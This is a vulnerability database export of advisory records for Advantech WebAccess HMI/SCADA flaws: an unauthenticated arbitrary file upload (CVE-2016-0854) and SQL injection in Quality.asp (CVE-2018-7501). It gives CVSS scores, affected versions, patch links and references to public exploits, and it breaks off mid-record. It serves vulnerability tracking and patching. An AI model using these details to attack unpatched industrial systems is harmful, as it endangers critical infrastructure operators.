Unrestricted file upload vulnerability in the uploadImageCommon function in the UploadAjaxAction script in the WebAccess Dashboard Viewer in Advantech WebAccess before 8.1 allows remote attackers to write to files of arbitrary types via unspecified vectors. Advantech WebAccess Contains a vulnerability where an unlimited number of files can be uploaded and written to any type of file. http://cwe.mitre.org/data/definitions/434.htmlIt may be written to any type of file by a third party. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the FileUpload script allows unauthenticated callers to upload arbitrary code to directories in the server where the code can be automatically executed under the high-privilege context of the IIS AppPool. An attacker can leverage this vulnerability to execute arbitrary code under the context of SYSTEM. Advantech WebAccess HMI/SCADA software provides remote control and management. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 2.1, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "CNNVD", "id": "CNNVD-201601-327" }, { "db": "NVD", "id": "CVE-2016-0854" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001284" } ] }, "credits": { "_id": null, "data": "rgod", "sources": [ { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" } ], "trust": 2.1 }, "cve": "CVE-2016-0854", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2016-0854", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 4.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00390", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-88364", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-0854", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2016-0854", "trust": 2.1, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2016-0854", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2016-0854", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2016-00390", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-327", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-88364", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-0854", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "VULHUB", "id": "VHN-88364" }, { "db": "VULMON", "id": "CVE-2016-0854" }, { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "CNNVD", "id": "CNNVD-201601-327" }, { "db": "NVD", "id": "CVE-2016-0854" } ] }, "description": { "_id": null, "data": "Unrestricted file upload vulnerability in the uploadImageCommon function in the UploadAjaxAction script in the WebAccess Dashboard Viewer in Advantech WebAccess before 8.1 allows remote attackers to write to files of arbitrary types via unspecified vectors. Advantech WebAccess Contains a vulnerability where an unlimited number of files can be uploaded and written to any type of file. http://cwe.mitre.org/data/definitions/434.htmlIt may be written to any type of file by a third party. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the FileUpload script allows unauthenticated callers to upload arbitrary code to directories in the server where the code can be automatically executed under the high-privilege context of the IIS AppPool. An attacker can leverage this vulnerability to execute arbitrary code under the context of SYSTEM. Advantech WebAccess HMI/SCADA software provides remote control and management. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0854" }, { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88364" }, { "db": "VULMON", "id": "CVE-2016-0854" } ], "trust": 4.68 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-88364", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39735", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-88364" }, { "db": "VULMON", "id": "CVE-2016-0854" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2016-0854", "trust": 5.8 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 3.5 }, { "db": "ZDI", "id": "ZDI-16-127", "trust": 1.9 }, { "db": "ZDI", "id": "ZDI-16-129", "trust": 1.9 }, { "db": "ZDI", "id": "ZDI-16-128", "trust": 1.9 }, { "db": "EXPLOIT-DB", "id": "39735", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201601-327", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00390", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001284", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3127", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3128", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3126", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D9C0A4-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "136769", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-88364", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-0854", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "VULHUB", "id": "VHN-88364" }, { "db": "VULMON", "id": "CVE-2016-0854" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "CNNVD", "id": "CNNVD-201601-327" }, { "db": "NVD", "id": "CVE-2016-0854" } ] }, "id": "VAR-201601-0036", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "VULHUB", "id": "VHN-88364" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00390" } ] }, "last_update_date": "2024-11-23T21:43:23.448000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 2.1, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess File Upload Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70314" }, { "title": "Advantech WebAccess Fixes for any file upload vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59645" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "CNNVD", "id": "CNNVD-201601-327" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "NVD", "id": "CVE-2016-0854" } ] }, "references": { "_id": null, "data": [ { "trust": 5.7, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/39735/" }, { "trust": 1.3, "url": "http://www.rapid7.com/db/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload" }, { "trust": 1.2, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-127" }, { "trust": 1.2, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-128" }, { "trust": 1.2, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-129" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0854" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0854" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-127" }, { "db": "ZDI", "id": "ZDI-16-129" }, { "db": "ZDI", "id": "ZDI-16-128" }, { "db": "CNVD", "id": "CNVD-2016-00390" }, { "db": "VULHUB", "id": "VHN-88364" }, { "db": "VULMON", "id": "CVE-2016-0854" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001284" }, { "db": "CNNVD", "id": "CNNVD-201601-327" }, { "db": "NVD", "id": "CVE-2016-0854" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-16-127", "ident": null }, { "db": "ZDI", "id": "ZDI-16-129", "ident": null }, { "db": "ZDI", "id": "ZDI-16-128", "ident": null }, { "db": "CNVD", "id": "CNVD-2016-00390", "ident": null }, { "db": "VULHUB", "id": "VHN-88364", "ident": null }, { "db": "VULMON", "id": "CVE-2016-0854", "ident": null }, { "db": "BID", "id": "80745", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2016-001284", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201601-327", "ident": null }, { "db": "NVD", "id": "CVE-2016-0854", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-01-21T00:00:00", "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-127", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-129", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-128", "ident": null }, { "date": "2016-01-21T00:00:00", "db": "CNVD", "id": "CNVD-2016-00390", "ident": null }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88364", "ident": null }, { "date": "2016-01-15T00:00:00", "db": "VULMON", "id": "CVE-2016-0854", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001284", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-327", "ident": null }, { "date": "2016-01-15T03:59:16.407000", "db": "NVD", "id": "CVE-2016-0854", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-127", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-129", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-128", "ident": null }, { "date": "2016-01-21T00:00:00", "db": "CNVD", "id": "CNVD-2016-00390", "ident": null }, { "date": "2016-12-03T00:00:00", "db": "VULHUB", "id": "VHN-88364", "ident": null }, { "date": "2016-12-03T00:00:00", "db": "VULMON", "id": "CVE-2016-0854", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001284", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-327", "ident": null }, { "date": "2024-11-21T02:42:30.770000", "db": "NVD", "id": "CVE-2016-0854", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-327" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess File upload vulnerability", "sources": [ { "db": "IVD", "id": "64d9c0a4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00390" } ], "trust": 0.8 }, "type": { "_id": null, "data": "lack of information", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-327" } ], "trust": 0.6 } }
var-201805-1144
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within Quality.asp. When parsing the ItemGroupIdAry parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose sensitive information under the context of the database. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). SQL injection vulnerabilities exist in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess node", "scope": null, "trust": 9.8, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess \u003c=8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-477" }, { "db": "CNVD", "id": "CNVD-2018-10317" }, { "db": "BID", "id": "104190" }, { "db": "CNNVD", "id": "CNNVD-201805-445" }, { "db": "NVD", "id": "CVE-2018-7501" } ] }, "credits": { "_id": null, "data": "rgod", "sources": [ { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-477" } ], "trust": 9.8 }, "cve": "CVE-2018-7501", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2018-7501", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 7.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-7501", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 3.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 6.1, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 6.5, "id": "CNVD-2018-10317", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:A/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 6.1, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 6.5, "id": "e2f022cf-39ab-11e9-a809-000c29342cb1", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:A/AC:L/Au:N/C:C/I:N/A:N", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-7501", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2018-7501", "trust": 9.8, "value": "MEDIUM" }, { "author": "nvd@nist.gov", "id": "CVE-2018-7501", "trust": 1.0, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-10317", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-445", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-477" }, { "db": "CNVD", "id": "CNVD-2018-10317" }, { "db": "CNNVD", "id": "CNNVD-201805-445" }, { "db": "NVD", "id": "CVE-2018-7501" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within Quality.asp. When parsing the ItemGroupIdAry parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose sensitive information under the context of the database. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess 